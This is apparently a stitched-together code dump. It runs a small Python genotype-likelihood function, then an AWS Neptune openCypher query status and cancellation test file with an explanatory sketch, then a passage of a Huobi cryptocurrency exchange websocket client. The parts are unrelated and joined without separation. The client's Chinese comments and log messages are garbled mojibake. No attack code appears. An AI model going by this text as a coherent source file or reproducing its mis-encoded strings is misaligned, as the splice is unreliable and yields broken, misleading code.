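from itertools import combinations_with_replacement
from math import prod

def conditional_likelihood(ck, ci, cj, r=0.03):
    # same shape as get_conditional_likelihood above: exact matches keep most of
    # the probability mass, mismatches decay geometrically with distance
    r_e = r / (2 + r)
    if ck == ci == cj:
        return 1 - r
    if ck == ci or ck == cj:
        other = cj if ck == ci else ci
        return 0.5 * ((1 - r) + r_e ** abs(ck - other))
    return 0.5 * (r_e ** abs(ck - ci) + r_e ** abs(ck - cj))

def genotype(observed_copy_numbers):
    candidates = sorted(set(observed_copy_numbers))
    pairs = list(combinations_with_replacement(candidates, 2))
    prior = 1.0 / len(pairs)                      # flat prior over pairs (assumption)
    posterior = {
        (ci, cj): prior * prod(conditional_likelihood(ck, ci, cj)
                               for ck in observed_copy_numbers)
        for ci, cj in pairs
    }
    total = sum(posterior.values())
    best = max(posterior, key=posterior.get)
    return best, posterior[best] / total

print(genotype([3, 3, 3, 4, 4, 4, 4, 3]))         # -> ((3, 4), probability close to 1)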
test_opencypher_query_without_iam.py
""" Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved. SPDX-License-Identifier: Apache-2.0 """ import json import threading import logging import time import requests from requests import HTTPError from test.integration.DataDrivenOpenCypherTest import DataDrivenOpenCypherTest logger = logging.getLogger('TestOpenCypherStatusWithoutIam') class TestOpenCypherStatusWithIam(DataDrivenOpenCypherTest): def do_opencypher_query_save_result(self, query, res, bolt: bool = False): try: if bolt: res['result'] = self.client.opencyper_bolt(query) else: res['result'] = self.client.opencypher_http(query) except requests.HTTPError as exception: res['error'] = exception.response.json() def setUp(self) -> None: res = self.client.opencypher_status() for q in res['queries']: self.client.opencypher_cancel(q['queryId']) def test_do_opencypher_status_nonexistent(self): query_id = "ac7d5a03-00cf-4280-b464-edbcbf51ffce" with self.assertRaises(HTTPError) as error: self.client.opencypher_status(query_id) err = json.loads(error.exception.response.content.decode('utf-8')) self.assertEqual(err['code'], "InvalidParameterException") expected_message = f'Supplied queryId {query_id} is invalid' self.assertEqual(err['detailedMessage'], expected_message) def test_do_opencypher_cancel_nonexistent(self): query_id = "ac7d5a03-00cf-4280-b464-edbcbf51ffce" with self.assertRaises(HTTPError) as error: self.client.opencypher_cancel(query_id) err = json.loads(error.exception.response.content.decode('utf-8')) self.assertEqual(err['code'], "InvalidParameterException") expected_message = f'Supplied queryId {query_id} is invalid' self.assertEqual(err['detailedMessage'], expected_message) def test_do_opencypher_cancel_empty_query_id(self): with self.assertRaises(ValueError): self.client.opencypher_cancel('') def test_do_opencypher_cancel_non_str_query_id(self): with self.assertRaises(ValueError): self.client.opencypher_cancel(42) def test_do_opencypher_status_and_cancel(self): query = '''MATCH(a)-->(b) MATCH(c)-->(d) RETURN a,b,c,d''' query_res = {} oc_query_thread = threading.Thread(target=self.do_opencypher_query_save_result, args=(query, query_res,)) oc_query_thread.start() time.sleep(3) status_res = self.client.opencypher_status() assert type(status_res) is dict assert 'acceptedQueryCount' in status_res assert 'runningQueryCount' in status_res assert 1 == status_res['runningQueryCount'] assert 'queries' in status_res query_id = '' for q in status_res['queries']: if query in q['queryString']: query_id = q['queryId'] assert query_id != '' cancel_res = self.client.opencypher_cancel(query_id) assert type(cancel_res) is dict assert cancel_res['status'] == '200 OK' oc_query_thread.join() assert 'result' not in query_res assert 'error' in query_res assert 'code' in query_res['error'] assert 'requestId' in query_res['error'] assert 'detailedMessage' in query_res['error'] assert 'CancelledByUserException' == query_res['error']['code'] def test_do_opencypher_status_and_cancel_silently(self): query = '''MATCH(a)-->(b) MATCH(c)-->(d) RETURN a,b,c,d''' query_res = {} oc_query_thread = threading.Thread(target=self.do_opencypher_query_save_result, args=(query, query_res,)) oc_query_thread.start() time.sleep(3) query_id = '' status = self.client.opencypher_status(query_id) assert status.status_code == 200 status_res = status.json() assert type(status_res) is dict assert 'acceptedQueryCount' in status_res assert 'runningQueryCount' in status_res assert 1 == status_res['runningQueryCount'] assert 'queries' in status_res query_id = '' for 
q in status_res['queries']: if query in q['queryString']: query_id = q['queryId'] assert query_id != '' self.assertNotEqual(query_id, '') cancel = self.client.opencypher_cancel(query_id) cancel_res = cancel.json() assert type(cancel_res) is dict assert cancel_res['status'] == '200 OK' oc_query_thread.join() assert type(query_res['result']) is dict assert 'a' in query_res['result']['head']['vars'] assert 'b' in query_res['result']['head']['vars'] assert 'c' in query_res['result']['head']['vars'] assert 'd' in query_res['result']['head']['vars'] assert [] == query_res['result']['results']['bindings'] def test_opencypher_bolt_query_with_cancellation(self): pass
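These tests all follow one pattern: fire a slow openCypher query on a background thread, find its queryId in the status response's 'queries' list, cancel it by id, and then inspect how the blocked call returns. A condensed sketch of that round trip, assuming `client` exposes the same opencypher_http / opencypher_status / opencypher_cancel methods the test base class provides:

import threading
import time

def run_query_async(client, query, out):
    # mirrors do_opencypher_query_save_result: stash either the result or the error
    try:
        out['result'] = client.opencypher_http(query)
    except Exception as exc:                       # a cancelled query surfaces as an HTTPError
        out['error'] = exc

def cancel_running_query(client, query):
    out = {}
    worker = threading.Thread(target=run_query_async, args=(client, query, out))
    worker.start()
    time.sleep(3)                                  # give the server time to register the query
    status = client.opencypher_status()            # {'runningQueryCount': ..., 'queries': [...]}
    query_id = next((q['queryId'] for q in status['queries']
                     if query in q['queryString']), '')
    if query_id:
        client.opencypher_cancel(query_id)
    worker.join()
    return out                                     # 'error' (e.g. CancelledByUserException) or 'result'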
core.py
#!/usr/bin/env python # -*- coding: utf-8 -*- # @Time : 2018/9/20 0020 9:23 # @Author : Hadrianl # @File : core.py # @Contact : [email protected] import websocket as ws import gzip as gz import json from . import utils as u from .utils import logger, zmq_ctx from threading import Thread import datetime as dt from dateutil import parser from functools import wraps import zmq import pickle import time from abc import abstractmethod import uuid from .handler import BaseHandler from concurrent.futures import ThreadPoolExecutor logger.debug(f'<TESTING>LOG_TESTING') class BaseWebsocket(object): ws_count = 0 def __new__(cls, *args, **kwargs): cls.ws_count += 1 if cls is _AuthWS: from .utils import ACCESS_KEY, SECRET_KEY if not (ACCESS_KEY and SECRET_KEY): raise Exception('ACCESS_KEYๆˆ–SECRET_KEYๆœช่ฎพ็ฝฎ๏ผ') return object.__new__(cls) def send_message(self, msg): # ๅ‘้€ๆถˆๆฏ msg_json = json.dumps(msg).encode() self.ws.send(msg_json) def on_message(self, _msg): # ๆŽฅๆ”ถws็š„ๆถˆๆฏๆŽจ้€ๅนถๅค„็†๏ผŒๅŒ…ๆ‹ฌไบ†pingpong๏ผŒๅค„็†่ฎข้˜…ๅˆ—่กจ๏ผŒไปฅๅŠๅค„็†ๆ•ฐๆฎๆŽจ้€ json_data = gz.decompress(_msg).decode() msg = json.loads(json_data) logger.debug(f'{msg}') @abstractmethod def pub_msg(self, msg): """ๆ ธๅฟƒ็š„ๅค„็†ๅ‡ฝๆ•ฐ๏ผŒๅฆ‚ๆžœๆ˜ฏhandle_func็›ดๆŽฅๅค„็†๏ผŒๅฆ‚ๆžœๆ˜ฏhandler๏ผŒๆŽจ้€ๅˆฐhandler็š„้˜Ÿๅˆ—""" raise NotImplementedError def on_error(self, error): logger.error(f'<้”™่ฏฏ>on_error:{error}') def on_close(self): logger.info(f'<่ฟžๆŽฅ>ๅทฒๆ–ญๅผ€ไธŽ{self.addr}็š„่ฟžๆŽฅ') if not self._active: return if self._reconn > 0: logger.info(f'<่ฟžๆŽฅ>ๅฐ่ฏ•ไธŽ{self.addr}่ฟ›่กŒ้‡่ฟž') self.__start() self._reconn -= 1 time.sleep(self._interval) else: logger.info(f'<่ฟžๆŽฅ>ๅฐ่ฏ•ไธŽ{self.addr}่ฟ›่กŒ้‡่ฟž') self.__start() time.sleep(self._interval) def on_open(self): self._active = True logger.info(f'<่ฟžๆŽฅ>ๅปบ็ซ‹ไธŽ{self.addr}็š„่ฟžๆŽฅ') # ------------------- ๆณจๅ†Œๅ›ž่ฐƒๅค„็†ๅ‡ฝๆ•ฐ ------------------------------- def register_onRsp(self, req): """ ๆทปๅŠ ๅ›ž่ฐƒๅค„็†ๅ‡ฝๆ•ฐ็š„่ฃ…้ฅฐๅ™จ :param req: ๅ…ทไฝ“็š„topic๏ผŒๅฆ‚ :return: """ def wrapper(_callback): callbackList = self._req_callbacks.setdefault(req, []) callbackList.append(_callback) return _callback return wrapper def unregister_onRsp(self, req): return self._req_callbacks.pop(req) # ------------------------------------------------------------------ # ------------------------- ๆณจๅ†Œhandler ----------------------------- def register_handler(self, handler): # ๆณจๅ†Œhandler if handler not in self._handlers: self._handlers.append(handler) handler.start(self.name) def unregister_handler(self, handler): # ๆณจ้”€handler if handler in self._handlers: self._handlers.remove(handler) handler.stop(self.name) def __add__(self, handler): if isinstance(handler, BaseHandler): self.register_handler(handler) else: raise Exception('{handler} is not aHandler') return self def __sub__(self, handler): if isinstance(handler, BaseHandler): self.unregister_handler(handler) else: raise Exception('{handler} is not aHandler') return self # ----------------------------------------------------------------- # --------------------- ๆณจๅ†Œhandle_func -------------------------- def register_handle_func(self, topic): # ๆณจๅ†Œhandle_func def _wrapper(_handle_func): if topic not in self._handle_funcs: self._handle_funcs[topic] = [] self._handle_funcs[topic].append(_handle_func) return _handle_func return _wrapper def unregister_handle_func(self, _handle_func_name, topic): """ ๆณจ้”€handle_func """ handler_list = self._handle_funcs.get(topic, []) for i, h in enumerate(handler_list): if 
h is _handle_func_name or h.__name__ == _handle_func_name: handler_list.pop(i) if self._handle_funcs.get(topic) == []: self._handle_funcs.pop(topic) # ----------------------------------------------------------------- # --------------------- handleๅฑžๆ€ง -------------------------------- @property def handlers(self): return self._handlers @property def handle_funcs(self): return self._handle_funcs @property def OnRsp_callbacks(self): return self._req_callbacks # ----------------------------------------------------------------- # -------------------------ๅผ€ๅ…ณws----------------------------------------- def run(self): if not hasattr(self, 'ws_thread') or not self.ws_thread.is_alive(): self.__start() def __start(self): self.ws = ws.WebSocketApp( self.addr, on_open=self.on_open, on_message=self.on_message, on_error=self.on_error, on_close=self.on_close, # on_data=self.on_data ) self.ws_thread = Thread(target=self.ws.run_forever, name=self.name) self.ws_thread.setDaemon(True) self.ws_thread.start() def stop(self): if hasattr(self, 'ws_thread') and self.ws_thread.is_alive(): self._active = False self.ws.close() # self.ws_thread.join() # ------------------------------------------------------------------------ class _AuthWS(BaseWebsocket): def __init__(self, host='api.huobi.br.com', reconn=10, interval=3): self._protocol = 'wss://' self._host = host self._path = '/ws/v1' self.addr = self._protocol + self._host + self._path self._threadPool = ThreadPoolExecutor(max_workers=3) # self.name = f'HuoBiAuthWS{self.ws_count}' self.name = f'HuoBiAuthWS_{uuid.uuid1()}' self.sub_dict = {} # ่ฎข้˜…ๅˆ—่กจ self._handlers = [] # ๅฏนmessageๅšๅค„็†็š„ๅค„็†ๅ‡ฝๆ•ฐๆˆ–ๅค„็†็ฑป self._req_callbacks = {} self._handle_funcs = {} self._auth_callbacks = [] self.ctx = zmq_ctx self.pub_socket = self.ctx.socket(zmq.PUB) self.pub_socket.bind(f'inproc://{self.name}') self._active = False self._reconn = reconn self._interval = interval def on_open(self): self._active = True logger.info(f'<่ฟžๆŽฅ>ๅปบ็ซ‹ไธŽ{self.addr}็š„่ฟžๆŽฅ') self.auth() logger.info(f'<้‰ดๆƒ>ๅ‘{self.addr}ๅ‘่ตท้‰ดๆƒ่ฏทๆฑ‚') def on_message(self, _msg): # ้‰ดๆƒws็š„ๆถˆๆฏๅค„็† json_data = gz.decompress(_msg).decode() msg = json.loads(json_data) logger.debug(f'{msg}') op = msg['op'] if op == 'ping': pong = {'op': 'pong', 'ts': msg['ts']} self.send_message(pong) if msg.setdefault('err-code', 0) == 0: if op == 'notify': self.pub_msg(msg) elif op == 'sub': logger.info( f'<่ฎข้˜…>Topic:{msg["topic"]}่ฎข้˜…ๆˆๅŠŸ Time:{dt.datetime.fromtimestamp(msg["ts"] / 1000)} #{msg["cid"]}#') elif op == 'unsub': logger.info( f'<่ฎข้˜…>Topic:{msg["topic"]}ๅ–ๆถˆ่ฎข้˜…ๆˆๅŠŸ Time:{dt.datetime.fromtimestamp(msg["ts"] / 1000)} #{msg["cid"]}#') elif op == 'req': logger.info(f'<่ฏทๆฑ‚>Topic:{msg["topic"]}่ฏทๆฑ‚ๆ•ฐๆฎๆˆๅŠŸ #{msg["cid"]}#') OnRsp = self._req_callbacks.get(msg['topic'], []) def callbackThread(_m): for cb in OnRsp: try: cb(_m) except Exception as e: logger.error(f'<่ฏทๆฑ‚ๅ›ž่ฐƒ>{msg["topic"]}็š„ๅ›ž่ฐƒๅ‡ฝๆ•ฐ{cb.__name__}ๅผ‚ๅธธ-{e}') task = self._threadPool.submit(callbackThread, msg) # _t = Thread(target=callbackThread, args=(msg,)) # _t.setDaemon(True) # _t.start() elif op == 'auth': logger.info( f'<้‰ดๆƒ>้‰ดๆƒๆˆๅŠŸ Time:{dt.datetime.fromtimestamp(msg["ts"] / 1000)} #{msg["cid"]}#') for cb in self._auth_callbacks: cb() else: logger.error( f'<้”™่ฏฏ>{msg.get("cid")}-OP:{op} ErrTime:{dt.datetime.fromtimestamp(msg["ts"] / 1000)} ErrCode:{msg["err-code"]} ErrMsg:{msg["err-msg"]}' ) def pub_msg(self, msg): """ๆ 
ธๅฟƒ็š„ๅค„็†ๅ‡ฝๆ•ฐ๏ผŒๅฆ‚ๆžœๆ˜ฏhandle_func็›ดๆŽฅๅค„็†๏ผŒๅฆ‚ๆžœๆ˜ฏhandler๏ผŒๆŽจ้€ๅˆฐhandler็š„้˜Ÿๅˆ—""" topic = msg.get('topic') self.pub_socket.send_multipart( [pickle.dumps(topic), pickle.dumps(msg)]) for h in self._handle_funcs.get(topic, []): h(msg) def auth(self, cid:str =''): from .utils import ACCESS_KEY, SECRET_KEY, createSign timestamp = dt.datetime.utcnow().strftime('%Y-%m-%dT%H:%M:%S') params = { "AccessKeyId": ACCESS_KEY, "SignatureMethod": "HmacSHA256", "SignatureVersion": "2", "Timestamp": timestamp,} signature = createSign(params, 'GET', self._host, self._path, SECRET_KEY) params['Signature'] = signature params['op'] = 'auth' params['cid'] = cid self.send_message(params) return 'auth', cid def sub_accounts(self, cid:str=''): msg = {'op': 'sub', 'cid': cid, 'topic': 'accounts'} self.send_message(msg) logger.info(f'<่ฎข้˜…>accouts-ๅ‘้€่ฎข้˜…่ฏทๆฑ‚ #{cid}#') return msg['topic'], cid def unsub_accounts(self, cid:str=''): msg = {'op': 'unsub', 'cid': cid, 'topic': 'accounts'} self.send_message(msg) logger.info(f'<่ฎข้˜…>accouts-ๅ‘้€่ฎข้˜…ๅ–ๆถˆ่ฏทๆฑ‚ #{cid}#') return msg['topic'], cid def sub_orders(self, symbol='*', cid:str=''): """ :param symbol: '*'ไธบ่ฎข้˜…ๆ‰€ๆœ‰่ฎขๅ•ๅ˜ๅŒ– :param cid: :return: """ msg = {'op': 'sub', 'cid': cid, 'topic': f'orders.{symbol}'} self.send_message(msg) logger.info(f'<่ฎข้˜…>orders-ๅ‘้€่ฎข้˜…่ฏทๆฑ‚*{symbol}* #{cid}#') return msg['topic'], cid def unsub_orders(self, symbol='*', cid:str=''): """ :param symbol: '*'ไธบ่ฎข้˜…ๆ‰€ๆœ‰่ฎขๅ•ๅ˜ๅŒ– :param cid: :return: """ msg = {'op': 'unsub', 'cid': cid, 'topic': f'orders.{symbol}'} self.send_message(msg) logger.info(f'<่ฎข้˜…>orders-ๅ‘้€ๅ–ๆถˆ่ฎข้˜…่ฏทๆฑ‚*{symbol}* #{cid}#') return msg['topic'], cid # ------------------------------------------------------------------------ # ----------------------ๅธๆˆท่ฏทๆฑ‚ๅ‡ฝๆ•ฐ-------------------------------------- def req_accounts(self, cid:str=''): msg = {'op': 'req', 'cid': cid, 'topic': 'accounts.list'} self.send_message(msg) logger.info(f'<่ฏทๆฑ‚>accounts-ๅ‘้€่ฏทๆฑ‚ #{cid}#') return msg['topic'], cid def req_orders(self, acc_id, symbol, states:list, types:list=None, start_date=None, end_date=None, _from=None, direct=None, size=None, cid:str=''): states = ','.join(states) msg = {'op': 'req', 'account-id': acc_id, 'symbol': symbol, 'states': states, 'cid': cid, 'topic': 'orders.list'} if types: types = ','.join(types) msg['types'] = types if start_date: start_date = parser.parse(start_date).strftime('%Y-%m-%d') msg['start-date'] = start_date if end_date: end_date = parser.parse(end_date).strftime('%Y-%m-%d') msg['end-date'] = end_date if _from: msg['_from'] = _from if direct: msg['direct'] = direct if size: msg['size'] = size self.send_message(msg) logger.info(f'<่ฏทๆฑ‚>orders-ๅ‘้€่ฏทๆฑ‚ #{cid}#') return msg['topic'], cid def req_orders_detail(self, order_id, cid:str=''): msg = {'op': 'req', 'order-id': order_id, 'cid': cid, 'topic': 'orders.detail'} self.send_message(msg) logger.info(f'<่ฏทๆฑ‚>accounts-ๅ‘้€่ฏทๆฑ‚ #{cid}#') return msg['topic'], cid def after_auth(self,_func): # wsๅผ€ๅฏไน‹ๅŽ้œ€่ฆๅฎŒๆˆ็š„ๅˆๅง‹ๅŒ–ๅค„็† @wraps(_func) def _callback(): try: _func() except Exception as e: logger.exception(f'afer_openๅ›ž่ฐƒๅค„็†้”™่ฏฏ{e}') self._auth_callbacks.append(_callback) return _callback class _HBWS(BaseWebsocket): def __init__(self, host='api.huobi.br.com', reconn=10, interval=3): self._protocol = 'wss://' self._host = host self._path = '/ws' self.addr = self._protocol + self._host + self._path self._threadPool = 
ThreadPoolExecutor(max_workers=3) # self.name = f'HuoBiWS{self.ws_count}' self.name = f'HuoBiWS_{uuid.uuid1()}' self.sub_dict = {} # ่ฎข้˜…ๅˆ—่กจ self._handlers = [] # ๅฏนmessageๅšๅค„็†็š„ๅค„็†ๅ‡ฝๆ•ฐๆˆ–ๅค„็†็ฑป self._req_callbacks = {} self._handle_funcs = {} self._open_callbacks = [] self.ctx = zmq_ctx self.pub_socket = self.ctx.socket(zmq.PUB) self.pub_socket.bind(f'inproc://{self.name}') self._active = False self._reconn = reconn self._interval = interval def on_open(self): self._active = True logger.info(f'<่ฟžๆŽฅ>ๅปบ็ซ‹ไธŽ{self.addr}็š„่ฟžๆŽฅ') for topic, subbed in self.sub_dict.items(): msg = {'sub': subbed['topic'], 'id': subbed['id']} self.send_message(msg) else: logger.info(f'<่ฎข้˜…>ๅˆๅง‹ๅŒ–่ฎข้˜…ๅฎŒๆˆ') for fun in self._open_callbacks: fun() def on_message(self, _msg): # ๆŽฅๆ”ถws็š„ๆถˆๆฏๆŽจ้€ๅนถๅค„็†๏ผŒๅŒ…ๆ‹ฌไบ†pingpong๏ผŒๅค„็†่ฎข้˜…ๅˆ—่กจ๏ผŒไปฅๅŠๅค„็†ๆ•ฐๆฎๆŽจ้€ json_data = gz.decompress(_msg).decode() msg = json.loads(json_data) logger.debug(f'{msg}') if 'ping' in msg: pong = {'pong': msg['ping']} self.send_message(pong) elif 'status' in msg: if msg['status'] == 'ok': if 'subbed' in msg: self.sub_dict.update({ msg['subbed']: { 'topic': msg['subbed'], 'id': msg['id'] } }) logger.info( f'<่ฎข้˜…>Topic:{msg["subbed"]}่ฎข้˜…ๆˆๅŠŸ Time:{dt.datetime.fromtimestamp(msg["ts"] / 1000)} #{msg["id"]}#' ) elif 'unsubbed' in msg: self.sub_dict.pop(msg['unsubbed']) logger.info( f'<่ฎข้˜…>Topic:{msg["unsubbed"]}ๅ–ๆถˆ่ฎข้˜…ๆˆๅŠŸ Time:{dt.datetime.fromtimestamp(msg["ts"] / 1000)} #{msg["id"]}#' ) elif 'rep' in msg: logger.info(f'<่ฏทๆฑ‚>Topic:{msg["rep"]}่ฏทๆฑ‚ๆ•ฐๆฎๆˆๅŠŸ #{msg["id"]}#') OnRsp = self._req_callbacks.get(msg['rep'], []) def callbackThread(_m): for cb in OnRsp: try: cb(_m) except Exception as e: logger.error(f'<่ฏทๆฑ‚ๅ›ž่ฐƒ>{msg["rep"]}็š„ๅ›ž่ฐƒๅ‡ฝๆ•ฐ{cb.__name__}ๅผ‚ๅธธ-{e}') task = self._threadPool.submit(callbackThread, msg) elif 'data' in msg: self.pub_msg(msg) # _t = Thread(target=callbackThread, args=(msg, )) # _t.setDaemon(True) # _t.start() elif msg['status'] == 'error': logger.error( f'<้”™่ฏฏ>{msg.get("id")}-ErrTime:{dt.datetime.fromtimestamp(msg["ts"] / 1000)} ErrCode:{msg["err-code"]} ErrMsg:{msg["err-msg"]}' ) else: self.pub_msg(msg) def pub_msg(self, msg): """ๆ ธๅฟƒ็š„ๅค„็†ๅ‡ฝๆ•ฐ๏ผŒๅฆ‚ๆžœๆ˜ฏhandle_func็›ดๆŽฅๅค„็†๏ผŒๅฆ‚ๆžœๆ˜ฏhandler๏ผŒๆŽจ้€ๅˆฐhandler็š„้˜Ÿๅˆ—""" if 'ch' in msg: topic = msg.get('ch') self.pub_socket.send_multipart( [pickle.dumps(topic), pickle.dumps(msg)]) for h in self._handle_funcs.get(topic, []): h(msg) @staticmethod def _check_info(**kwargs): log = [] if 'period' in kwargs and kwargs['period'] not in u.PERIOD: log.append(f'<้ชŒ่ฏ>ไธๅญ˜ๅœจPeriod:{kwargs["period"]}') if 'depth' in kwargs and kwargs['depth'] not in u.DEPTH: log.append(f'<้ชŒ่ฏ>ไธๅญ˜ๅœจDepth:{kwargs["depth"]}') if log: for l in log: logger.warning(l) return False else: return True # ----------------------่กŒๆƒ…่ฎข้˜…ๅ‡ฝๆ•ฐ--------------------------------------- def sub_overview(self, _id=''): msg = {'sub': 'market.overview', 'id': _id} self.send_message(msg) logger.info(f'<่ฎข้˜…>overview-ๅ‘้€่ฎข้˜…่ฏทๆฑ‚ #{_id}#') return msg['sub'], _id def unsub_overview(self, _id=''): msg = {'unsub': 'market.overview', 'id': _id} self.send_message(msg) logger.info(f'<่ฎข้˜…>overview-ๅ‘้€ๅ–ๆถˆ่ฎข้˜…่ฏทๆฑ‚ #{_id}#') return msg['unsub'], _id def sub_kline(self, symbol, period, _id=''): if self._check_info(symbol=symbol, period=period): msg = {'sub': f'market.{symbol}.kline.{period}', 'id': _id} self.send_message(msg) 
logger.info(f'<่ฎข้˜…>kline-ๅ‘้€่ฎข้˜…่ฏทๆฑ‚*{symbol}*@{period} #{_id}#') return msg['sub'], _id def unsub_kline(self, symbol, period, _id=''): if self._check_info(symbol=symbol, period=period): msg = {'unsub': f'market.{symbol}.kline.{period}', 'id': _id} self.send_message(msg) logger.info(f'<่ฎข้˜…>kline-ๅ‘้€ๅ–ๆถˆ่ฎข้˜…่ฏทๆฑ‚*{symbol}*@{period} #{_id}#') return msg['unsub'], _id def sub_depth(self, symbol, depth=0, _id=''): if self._check_info(symbol=symbol, depth=depth): msg = {'sub': f'market.{symbol}.depth.{u.DEPTH[depth]}', 'id': _id} self.send_message(msg) logger.info(f'<่ฎข้˜…>depth-ๅ‘้€่ฎข้˜…่ฏทๆฑ‚*{symbol}*@{u.DEPTH[depth]} #{_id}#') return msg['sub'], _id def unsub_depth(self, symbol, depth=0, _id=''): if self._check_info(symbol=symbol, depth=depth): msg = { 'unsub': f'market.{symbol}.depth.{u.DEPTH[depth]}', 'id': _id } self.send_message(msg) logger.info( f'<่ฎข้˜…>depth-ๅ‘้€ๅ–ๆถˆ่ฎข้˜…่ฏทๆฑ‚*{symbol}*@{u.DEPTH[depth]} #{_id}#') return msg['unsub'], _id def sub_tick(self, symbol, _id=''): if self._check_info(symbol=symbol): msg = {'sub': f'market.{symbol}.trade.detail', 'id': _id} self.send_message(msg) logger.info(f'<่ฎข้˜…>tick-ๅ‘้€่ฎข้˜…่ฏทๆฑ‚*{symbol}* #{_id}#') return msg['sub'], _id def unsub_tick(self, symbol, _id=''): if self._check_info(symbol=symbol): msg = {'unsub': f'market.{symbol}.trade.detail', 'id': _id} self.send_message(msg) logger.info(f'<่ฎข้˜…>tick-ๅ‘้€ๅ–ๆถˆ่ฎข้˜…่ฏทๆฑ‚*{symbol}* #{_id}#') return msg['unsub'], _id def sub_all_lastest_24h_ohlc(self, _id=''): msg = {'sub': f'market.tickers', 'id': _id} self.send_message(msg) logger.info(f'<่ฎข้˜…>all_ticks-ๅ‘้€่ฎข้˜…่ฏทๆฑ‚ #{_id}#') return msg['sub'], _id def unsub_all_lastest_24h_ohlc(self, _id=''): msg = {'unsub': f'market.tickers', 'id': _id} self.send_message(msg) logger.info(f'<่ฎข้˜…>all_ticks-ๅ‘้€ๅ–ๆถˆ่ฎข้˜…่ฏทๆฑ‚ #{_id}#') return msg['unsub'], _id # ------------------------------------------------------------------------- # -------------------------่กŒๆƒ…่ฏทๆฑ‚ๅ‡ฝๆ•ฐ---------------------------------------- def req_kline(self, symbol, period, _id='', **kwargs): if self._check_info(symbol=symbol, period=period): msg = {'req': f'market.{symbol}.kline.{period}', 'id': _id} if '_from' in kwargs: _from = parser.parse(kwargs['_from']).timestamp() if isinstance( kwargs['_from'], str) else kwargs['_from'] msg.update({'from': int(_from)}) if '_to' in kwargs: _to = parser.parse(kwargs['_to']).timestamp() if isinstance( kwargs['_to'], str) else kwargs['_to'] msg.update({'to': int(_to)}) self.send_message(msg) logger.info(f'<่ฏทๆฑ‚>kline-ๅ‘้€่ฏทๆฑ‚*{symbol}*@{period} #{_id}#') return msg['req'], _id def req_depth(self, symbol, depth=0, _id=''): if self._check_info(depth=depth): msg = {'req': f'market.{symbol}.depth.{u.DEPTH[depth]}', 'id': _id} self.send_message(msg) logger.info(f'<่ฏทๆฑ‚>depth-ๅ‘้€่ฏทๆฑ‚*{symbol}*@{u.DEPTH[depth]} #{_id}#') return msg['req'], _id def req_tick(self, symbol, _id=''): msg = {'req': f'market.{symbol}.trade.detail', 'id': _id} self.send_message(msg) logger.info(f'<่ฏทๆฑ‚>tick-ๅ‘้€่ฏทๆฑ‚*{symbol}* #{_id}#') return msg['req'], _id def req_symbol(self, symbol, _id=''): msg = {'req': f'market.{symbol}.detail', 'id': _id} self.send_message(msg) logger.info(f'<่ฏทๆฑ‚>symbol-ๅ‘้€่ฏทๆฑ‚*{symbol}* #{_id}#') return msg['req'], _id # ------------------------------------------------------------------------- def after_open(self,_func): # wsๅผ€ๅฏไน‹ๅŽ้œ€่ฆๅฎŒๆˆ็š„ๅˆๅง‹ๅŒ–ๅค„็† @wraps(_func) def _callback(): try: _func() except Exception as e: 
logger.exception(f'afer_openๅ›ž่ฐƒๅค„็†้”™่ฏฏ{e}') self._open_callbacks.append(_callback) return _callback class _HBDerivativesWS(BaseWebsocket): def __init__(self, host='www.hbdm.com', reconn=10, interval=3): self._protocol = 'wss://' self._host = host self._path = '/ws' self.addr = self._protocol + self._host + self._path self._threadPool = ThreadPoolExecutor(max_workers=3) # self.name = f'HuoBiWS{self.ws_count}' self.name = f'HuoBiDerivativesWS_{uuid.uuid1()}' self.sub_dict = {} # ่ฎข้˜…ๅˆ—่กจ self._handlers = [] # ๅฏนmessageๅšๅค„็†็š„ๅค„็†ๅ‡ฝๆ•ฐๆˆ–ๅค„็†็ฑป self._req_callbacks = {} self._handle_funcs = {} self._open_callbacks = [] self.ctx = zmq_ctx self.pub_socket = self.ctx.socket(zmq.PUB) self.pub_socket.bind(f'inproc://{self.name}') self._active = False self._reconn = reconn self._interval = interval def on_open(self): self._active = True logger.info(f'<่ฟžๆŽฅ>ๅปบ็ซ‹ไธŽ{self.addr}็š„่ฟžๆŽฅ') for topic, subbed in self.sub_dict.items(): msg = {'sub': subbed['topic'], 'id': subbed['id']} self.send_message(msg) else: logger.info(f'<่ฎข้˜…>ๅˆๅง‹ๅŒ–่ฎข้˜…ๅฎŒๆˆ') for fun in self._open_callbacks: fun() def on_message(self, _msg): # ๆŽฅๆ”ถws็š„ๆถˆๆฏๆŽจ้€ๅนถๅค„็†๏ผŒๅŒ…ๆ‹ฌไบ†pingpong๏ผŒๅค„็†่ฎข้˜…ๅˆ—่กจ๏ผŒไปฅๅŠๅค„็†ๆ•ฐๆฎๆŽจ้€ json_data = gz.decompress(_msg).decode() msg = json.loads(json_data) logger.debug(f'{msg}') if 'ping' in msg: pong = {'pong': msg['ping']} self.send_message(pong) elif 'status' in msg: if msg['status'] == 'ok': if 'subbed' in msg: self.sub_dict.update({ msg['subbed']: { 'topic': msg['subbed'], 'id': msg['id'] } }) logger.info( f'<่ฎข้˜…>Topic:{msg["subbed"]}่ฎข้˜…ๆˆๅŠŸ Time:{dt.datetime.fromtimestamp(msg["ts"] / 1000)} #{msg["id"]}#' ) elif 'unsubbed' in msg: self.sub_dict.pop(msg['unsubbed']) logger.info( f'<่ฎข้˜…>Topic:{msg["unsubbed"]}ๅ–ๆถˆ่ฎข้˜…ๆˆๅŠŸ Time:{dt.datetime.fromtimestamp(msg["ts"] / 1000)} #{msg["id"]}#' ) elif 'rep' in msg: logger.info(f'<่ฏทๆฑ‚>Topic:{msg["rep"]}่ฏทๆฑ‚ๆ•ฐๆฎๆˆๅŠŸ #{msg["id"]}#') OnRsp = self._req_callbacks.get(msg['rep'], []) def callbackThread(_m): for cb in OnRsp: try: cb(_m) except Exception as e: logger.error(f'<่ฏทๆฑ‚ๅ›ž่ฐƒ>{msg["rep"]}็š„ๅ›ž่ฐƒๅ‡ฝๆ•ฐ{cb.__name__}ๅผ‚ๅธธ-{e}') task = self._threadPool.submit(callbackThread, msg) elif 'data' in msg: self.pub_msg(msg) # _t = Thread(target=callbackThread, args=(msg, )) # _t.setDaemon(True) # _t.start() elif msg['status'] == 'error': logger.error( f'<้”™่ฏฏ>{msg.get("id")}-ErrTime:{dt.datetime.fromtimestamp(msg["ts"] / 1000)} ErrCode:{msg["err-code"]} ErrMsg:{msg["err-msg"]}' ) else: self.pub_msg(msg) def pub_msg(self, msg): """ๆ 